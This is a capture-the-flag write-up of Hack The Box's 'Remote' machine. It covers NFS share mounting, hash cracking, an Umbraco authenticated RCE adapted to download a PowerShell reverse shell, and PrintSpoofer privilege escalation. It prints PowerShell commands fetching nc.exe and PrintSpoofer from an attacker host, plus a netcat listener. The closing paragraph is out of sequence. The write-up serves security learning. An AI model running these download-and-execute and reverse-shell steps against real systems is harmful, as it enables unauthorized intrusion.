Remote

Last updated 5 months ago

Introduction

This write-up details the steps taken to solve the Remote machine from Hack The Box. The approach includes reconnaissance, enumeration, exploitation, and privilege escalation to gain root access.

Reconnaissance

Initial Nmap Scan

To begin the process, an nmap scan was conducted to identify open ports and services running on the target machine:

nmap -sV -p- 10.10.10.180

The initial Nmap scan revealed a variety of open ports and running services on the target machine:

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-07T14:17:27
|_  start_date: N/A

Enumeration

Enumeration (Port 21)

Anonymous FTP login is enabled, so I enumerated the files on the FTP service, but I didn't find anything interesting.

Enumeration (Port 80)

During enumeration, I discovered a login page for Umbraco CMS.

Scanning for directories with gobuster revealed several; none appeared immediately exploitable, but the results confirmed that Umbraco CMS was in use.

Enumeration (Port 445)

Attempts to access Samba shares as a guest were unsuccessful, as guest access was not permitted.

Enumeration (Port 111)

Reviewing the initial Nmap output for this port, I noticed that NFS (Network File System) services were running:

|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs

To check which folders were available for mounting, I used the following command:

showmount -e 10.10.10.180

Then, I mounted the discovered folder:

sudo mount -t nfs 10.10.10.180:/site_backups mnt

While researching typical Umbraco configurations, I learned that credentials are often stored in the App_Data/umbraco.sdf file. Although I wasn’t familiar with the best way to parse this file type, running strings on the file revealed sensitive information right at the top.

I detected a SHA-1 hashed password. Using CrackStation, I successfully cracked the hash.

This revealed the Umbraco admin password: baconandcheese.

Next, I looked up the version of Umbraco in use.

Exploiting Umbraco CMS for Remote Code Execution

The Exploit-DB exploit for Umbraco 7.12.4 initially launches calc.exe as the payload, so I modified it to download and execute a PowerShell reverse shell script instead. I used Nishang’s TCP reverse shell (shell.ps1), hosted on my machine with Python’s http.server. REMEMBER TO EDIT THE POWERSHELL SCRIPT!

I hosted the shell.ps1 file using python -m http.server 80 to serve it for download by the target machine. Simultaneously, I started a listener on port 4444 with nc -lvnp 4444 to catch the reverse shell connection. When I ran the exploit, it triggered the payload, and the reverse shell successfully connected back to my machine, granting me access.

Finally, I retrieved the first flag from C:/Users/Public/Desktop/flag.txt.

Privilege Escalation (user -> root)

I noticed that SeImpersonatePrivilege was enabled on the target machine, a Windows Server 2019 system. This configuration is vulnerable to token impersonation attacks. Given this, I decided to use PrintSpoofer to escalate privileges to SYSTEM.

First, I uploaded both nc.exe and PrintSpoofer64.exe to the victim machine using PowerShell:

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.22/nc.exe", "C:\Temp\nc.exe")
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.22/PrintSpoofer64.exe", "C:\Temp\PrintSpoofer64.exe")

Next, I started a listener on port 5555 on my machine. By executing PrintSpoofer64.exe with a reverse shell command targeting nc.exe, I gained SYSTEM-level access on the target.

The exploit successfully escalated privileges, completing the attack.

Using the credentials admin@htb.local:baconandcheese, I accessed the Umbraco CMS panel. The version in use was 7.12.4, which is vulnerable to an authenticated remote code execution exploit (Exploit-DB: Umbraco CMS 7.12.4 - Authenticated RCE).